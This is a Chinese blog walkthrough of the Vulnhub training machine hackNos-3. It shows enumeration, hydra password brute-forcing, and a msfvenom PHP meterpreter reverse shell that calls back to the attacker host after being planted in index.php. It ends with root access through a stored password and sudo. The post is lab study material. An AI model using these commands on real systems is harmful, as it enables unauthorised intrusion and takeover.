Vulnhub-靶机Hacknos-3

已于 2024-01-09 16:24:14 修改
阅读量46 收藏
点赞数
分类专栏: 靶机实操 文章标签: 网络安全 安全 web安全
于 2023-06-16 17:59:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_76786857/article/details/131243574
版权

目录

0.靶机配置

1.信息收集

1.1主机发现

1.2端口扫描

2.遍历目录

3.webshell

4.提权

kali ip:192.168.245.129

靶机 ip:192.168.245.133

介绍
系列: hackNos
发布日期: 2019年12月14日
难度: 中级
Flag : 一个普通用户的,一个根用户的
学习:漏洞利用、web攻击、枚举、权限提升
靶机地址:https://www.vulnhub.com/entry/hacknos-os-hacknos-3,410/

0.靶机配置

将下载下来的靶机文件Os-hackNos-3.ova导入到vm中

导入后,因为无法获取ip地址,故需要进行设置配置

需要在启动界面点击shift进入如下界面按下e

向下翻动,将ro改为rw single init=/bin/bash

然后按下 ctrl+x进入shell

使用ip a查看网卡名

使用 :q退出后

使用vim /etc/netplan/50-cloud-init.yaml进行编辑,此处将错误的网卡改为ens33

1.信息收集

1.1主机发现

在kali里使用netdiscover发现主机

arp-scan -l
nmap -sn 192.168.245.0/24

 发现192.168.245.133就是目标靶机的ip地址

1.2端口扫描

使用nmap对目标靶机开放的端口进行扫描

nmap -Pn -n -sV 192.168.245.133

 发现目标靶机仅开放了两个tcp端口,22和80端口

2.遍历目录

访问80端口,发现只有一个页面,没有其他信息。

 使用dirb命令,对靶机的目录进行遍历。

dirb http://192.168.245.133

只发现一个scripts目录。访问http://192.168.245.133/scripts未发现有用信息。

百度后尝试访问http://192.168.245.133/websec,又是一个页面,用dirb遍历websec下的内容。

dirb http://192.168.245.133/websec/

 

 遍历扫描的目录,发现一个登录页面http://192.168.245.133/websec/adminhttp://192.168.245.133/websec/login也一样)。

 一个Email作为用户名。在http://192.168.245.133/websec中存在一个邮箱contact@hacknos.com,尝试用该账户爆破密码。使用系统自带的字典无法爆破出密码.使用cewl爬取http://192.168.245.133/websec页面,生成字典。

cewl http://192.168.245.133/websec -w pass
cat pass

 使用hydra爆破密码。查看登录请求报文如下

 登录失败时会返回提示信息Wrong email or password

 执行命令,爆破密码为Securityx

3.webshell

通过账户contact@hacknos.com:Securityx登录后台,可以管理web服务的文件。

访问

使用msfvenom生成一个php反弹shell的poc

msfvenom -l payload |grep php|grep reverse |grep tcp
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.245.129 LPORT=1234 -f raw > webshell.php

 将生成的webshell写入index.php中。进入msfconsole监听本地1234端口

use exploit/multi/handler

set payload php/meterpreter_reverse_tcp
options

set lhost 192.168.245.129
set lport 1234
run

 访问http://192.168.245.133/websec/即可接收反弹shell。进入home目录获得地一个flag

shell
cd /home
ls
cd blackdevil
ls
cat user.txt
python -c 'import pty; pty.spawn("/bin/bash")'

4.提权

反弹的webshell是www-data用户。该账户没有sudo配置,搜索带有SUID程序发现也没有可以利用提权的。经发现在/var/local目录下有个database文件,里面有个fackespreadsheet的加密内容。

cd /var/local
ls
cat database

在这里插入图片描述

进行解密,获得结果Security@x@,这个就是用户blackdevil的密码

切换到blackdevil账户后,查询其sudo配置,发现可以执行所有命令,从而获得第二个flag。

su blackdevil
Security@x@
id
sudo -l
Security@x@

sudo su
id
cd /root
ls
cat root.txt

廾匸0705
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
vulnhub靶机 Os-hackNos-1
witwitwiter的博客
08-24 2195
vulnhub靶机 Os-hackNos-1 靶机下载 https://www.vulnhub.com/entry/hacknos-os-hacknos,401 目标为 普通用户的user.txt和root用户的root.txt 靶机配置 在将靶机文件下载下来为Os-hackNos-1.ova 使用vm打开这个ova文件进行导入。导入完成后,若是遇到无法获取ip地址,则需要在启动界面点击shift进入如下界面按下e 向下翻动,将ro改为rw single init=/bin/bash 然后按下 ctr
Vulnhub--OS-HACKNOS-2.1
流水不争先,争的是滔滔不绝
06-22 510
(1)wpsacn扫描wordpress站点;(2)以root权限进行su切换root用户时,无需输入root密码
Vulnhub靶机HACKNOS_ OS-HACKNOS-3
LainWith的博客
01-16 1971
目录介绍信息收集主机发现主机信息探测网站探测目录扫描访问子目录爆破登录站点登录网站Getshell方法1:命令执行-失败方法2:msf-失败方法3:冰蝎第一个Flag提权获取flag2查找 suid 文件-cpulimit提权通过dock提权参考 介绍 系列: hackNos 发布日期: 2019年12月14日 难度: 中级 Flag : 一个普通用户的,一个根用户的 学习:漏洞利用、web攻击、枚举、权限提升 靶机地址:https://www.vulnhub.com/entry/hacknos-os-ha
vulnhub靶机Os-hackNos-1
mingyqf的博客
06-22 1008
靶机下载 https://www.vulnhub.com/entry/hacknos-os-hacknos,401KALI: 192.168.59.141/24 靶机:192.168.59.146/24目标获取2个flagPS:(Vulnhub靶机检测不到IP 修改完ip 重启就ok了) 环境搭建成功! 发现服务: 用kali中的whatweb来探测一下Drupal的版本,看是否有相应的漏洞,发现是Drupal7 在GitHub上面查找一下是否有该框架的漏洞以及exp,或者利用msf搜索,我这利用msf
Vulnhub靶机HACKNOS:OS-HACKNOS-2.1
LainWith的博客
02-05 3170
目录介绍信息收集主机发现主机信息探测网站探测目录扫描wpscan漏扫网站测试POC破解用户密码SSH登录破解用户密码Flag1提权-Flag2参考 介绍 系列: hackNos(此系列共7台) 发布日期:2020 年 1 月 18 日 难度:初级-中级 Flag : 2个,一个普通用户的,一个根用户的 学习: wordpress 安全测试 本地包含漏洞利用 john破解 特权提升 靶机地址:https://www.vulnhub.com/entry/hacknos-reconforce,416/ 信息收
Vulnhub靶机练习笔记-Os-hackNos-1
2301_80115097的博客
04-10 825
现在提权的思路就是先下载靶机上的passwd,然后添加一个有root权限的用户到构造的passwd文件中,然后使用wget -O把构造的passwd内容重定向输入到原本的/etc/passwd中。dirb也扫一边,貌似dirb扫到的结果比dirsearch多,所以在实战的时候可以用多个不同的工具进行信息收集,这样才更全面。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。访问drupal目录,是一个登录界面,弱口令登录测试无果,换换别的思路。
Vulnhub--hackNos: Os-hackNos-3
weixin_45168704的博客
06-13 133
hackNos系列3
Vulnhub——HackNos-2.1
2301_76786857的博客
06-15 116
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。拿到shell 获取最终的flag,只有拿到root权限才可以发现最终的flag。
vulnhub-Os-hackNos-3(包含多种靶机获取不了IP地址情况)
m0_60894143的博客
07-08 444
首先在命令行输入mount -o rw,remount / ,否则后面可能无法保存网络配置文件 然后继续输入命令 vi /etc/network/interfaces修改网络配置文件,我看可以看到配置文件中网卡信息与实际信息不符。修改完成后,输入:wq保存退出后重启系统 如果发现没有interfacers文件,则按照下面方法 进入/etc/netplan。查看是否存在可以提权的命令登录用户blackdevil,该用户是在/home目录下发现的,然后用sudo提权。
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
VulnHub-Tr0ll1.zip
01-12
VulnHub-Tr0ll1靶机学习笔记,一部分是学习笔记过程,另一部分是学习过程整理的lol.pacp\.c文档、user.txt等文档,供大家参考学习
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 Five-3靶机
12-07
Vulnhub靶机渗透测试 Five-3靶机
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8350
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
极速下载!青苹果系统Win7旗舰版:稳定安全
lihuiyun184291的博客
07-25 426
今天系统之家小编给大家带来了青苹果系统Win7旗舰版镜像,该版本系统离线制作而成,安全无病毒,还升级了防火墙功能,大家安装后时刻都能放心操作。同时,它是在保持原有的功能并适度优化,保留下来的功能轻松满足大家的使用需求,系统稳定性也很高,运作顺畅不卡顿。
微软蓝屏事件引发对构建更加稳固和安全的网络环境的思考
lupai的博客
07-24 496
综上所述,构建更加稳固和安全的网络环境需要政府、企业和用户共同努力,从政策、技术、用户行为等多个方面入手,形成全方位、多层次的网络安全防护体系。构建更加稳固和安全的网络环境是一个系统工程,需要从多个方面入手,包括政策、技术、用户行为等多个层面。建立完善的应急响应机制,制定应急预案和演练计划,提高应对网络攻击和突发事件的能力。鼓励和支持网络安全技术的研发和创新,推动新技术在网络安全领域的应用和推广。加强对用户的网络安全教育,提高用户的网络安全意识和防范能力。
2024安全大模型技术与市场研究报告
最新发布
cybtec的博客
07-25 458
2024安全大模型技术与市场研究报告
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

廾匸0705

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值